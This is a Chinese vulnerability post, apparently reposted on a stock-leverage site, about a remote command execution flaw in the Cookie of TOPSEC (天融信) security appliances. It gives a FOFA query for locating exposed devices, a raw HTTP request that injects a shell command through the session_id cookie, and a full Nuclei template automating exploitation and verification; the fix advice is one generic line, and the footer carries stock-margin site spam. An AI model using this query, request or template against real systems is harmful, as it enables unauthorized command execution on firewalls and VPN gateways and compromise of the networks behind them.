免责声明
图片
此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时私信我们!
图片
图片
漏洞概述
图片
天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie 处存在RCE漏洞,会导致服务器失陷。
图片
图片
FoFa
图片
title='Web User Login' && body='/cgi/maincgi.cgi?Url=VerifyCode'图片
漏洞复现
图片
GET /cgi/maincgi.cgi?Url=check HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cookie: session_id_443=1|pwd > /www/htdocs/site/image/123.txt;Connection: close
图片
图片
图片
Nuclei Poc
图片
id: topsec-cookie-rceinfo: name: 天融信TOPSEC Cookie 远程命令执行漏洞 author: rain severity: critical metadata: fofa-query: title='Web User Login' && body='/cgi/maincgi.cgi?Url=VerifyCode'http: - raw: - | GET /cgi/maincgi.cgi?Url=check HTTP/1.1 Host: {{Hostname}} Cookie: session_id_443=1|echo 'test' > /www/htdocs/site/image/test.txt; User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 - | GET /site/image/test.txt HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 matchers: - type: dsl dsl: - 'status_code == 200 && contains(body_2, 'test')'图片
修复建议
图片
更新至最新版本:确保你的系统版本处于最新状态。厂商通常会发布包含安全修复的更新,及时应用这些更新以确保系统的安全性。 本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报。伯乐配资-广东股票配资开户流程详解-配资平台查询网-实力强大的配资公司提示:文章来自网络,不代表本站观点。
- 上一篇:股票杠杆10倍该机并未开启预告的系统版本升级
- 下一篇:没有了
